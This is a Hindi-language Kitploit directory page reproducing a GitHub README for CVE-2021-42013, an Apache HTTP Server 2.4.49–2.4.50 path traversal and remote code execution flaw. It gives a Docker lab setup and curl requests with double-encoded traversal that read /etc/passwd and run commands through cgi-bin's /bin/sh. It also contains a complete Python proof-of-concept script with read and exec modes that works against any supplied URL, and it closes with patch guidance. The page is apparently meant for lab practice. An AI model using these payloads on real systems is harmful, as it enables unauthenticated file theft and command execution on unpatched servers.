Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-42013 — CVE-2021-42013 Apache HTTP Server path traversal और remote code execution कमजोरी के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Docker-आधारित प्रयोगशाला वातावरण और Python PoC स्क्रिप्ट के साथ। | Kitploit
उपकरण/GitHubGitHub/eunho87/cve-2021-42013
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubeunho87/cve-2021-42013

CVE-2021-42013

CVE-2021-42013 Apache HTTP Server path traversal और remote code execution कमजोरी के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Docker-आधारित प्रयोगशाला वातावरण और Python PoC स्क्रिप्ट के साथ।

रिपॉजिटरी देखें
42 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-42013

योगदानकर्ता

  • 석은호@eunho87

CVE-2021-42013 Apache http Server पथ ट्रैवर्सल

भेद्यता सारांश

Apache HTTP Server 2.4.50 के पथ सामान्यीकरण प्रसंस्करण में एक बग के कारण प्रमाणीकरण के बिना मनमानी फ़ाइलें पढ़ी जा सकती हैं या रिमोट कोड निष्पादित किया जा सकता है।

CVE-2021-41773 के अधूरे पैच के कारण उत्पन्न हुआ और दोहरे URL एन्कोडिंग (%%32%65) के माध्यम से Apache के पथ अवरोधन को बायपास किया।

संदर्भ

  • NVD - CVE-2021-42013
  • Apache Security Advisory

भेद्यता की शर्तें

CVE-2021-42013 के काम करने के लिए निम्नलिखित शर्तों को पूरा करना होगा।

  1. Apache 2.4.49~2.4.50
  2. httpd.conf में Directory directive सेटिंग Required all denied नहीं होनी चाहिए
  3. mod_cgi मॉड्यूल सक्रिय (RCE के मामले में)

पर्यावरण सेटअप

root@kitploit:~
docker-compose up -d

परीक्षण वातावरण चल रहा है यह जांचने के लिए नीचे दिए गए कोड को चलाएँ।

root@kitploit:~
docker-compose ps

सर्वर सामान्य रूप से चलने पर http://localhost:8080 तक पहुँचा जा सकता है।

भेद्यता पुनरुत्पादन

पैरेंट फ़ोल्डर में जाने के लिए ../ का उपयोग किया जाता है, लेकिन Apache उन वर्णों को ब्लॉक कर देता है। इसे बायपास करने के लिए, . के एन्कोडेड मान 2e का उपयोग किया जा सकता है। Apache 2.4.50 संस्करण %2e एन्कोडिंग को डिकोड करने के बाद जांच करता है, इसलिए %2e2e का उपयोग करने पर ../ की तरह वर्ण ब्लॉक हो जाते हैं। इसलिए, दोहरे एन्कोडिंग का उपयोग करके %%32%65 के साथ उस फ़िल्टरिंग को बायपास करना होगा।

root@kitploit:~
curl -s --path-as-is "http://localhost:8080/static/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"

CGI सक्षम वातावरण में, अंतिम भाग को /bin/sh में बदलकर RCE संभव है।

root@kitploit:~
curl -s --path-as-is -X POST \
  --data "echo Content-Type: text/plain; echo; id; uname -a" \
  "http://localhost:8080/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"


PoC कोड

Python (poc.py)

root@kitploit:~
#!/usr/bin/env python3
import sys
import http.client
from urllib.parse import urlparse

def exploit(target_url, mode, arg):
    parsed = urlparse(target_url)
    host = parsed.hostname
    port = parsed.port or 80
    trav = "%%32%65%%32%65/" * 4
    
    if mode == "read":
        path = f"/static/{trav}{arg}"
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request("GET", path)
    else:
        path = f"/cgi-bin/{trav}bin/sh"
        body = f"echo Content-Type: text/plain; echo; {arg}"
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request("POST", path, body=body, headers={"Content-Type": "application/x-www-form-urlencoded"})
    
    result = conn.getresponse().read().decode("utf-8", "replace")
    conn.close()
    return result

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"उपयोग: {sys.argv[0]} <url> <read|exec> <arg>")
        sys.exit(1)
    print(exploit(sys.argv[1], sys.argv[2], sys.argv[3]))

प्रतिकार उपाय

  • Apache 2.4.51 या उच्च संस्करण में अपडेट करें
  • Require all denied बनाए रखें

सारांश

root@kitploit:~
docker-compose down

टूल डाउनलोड करें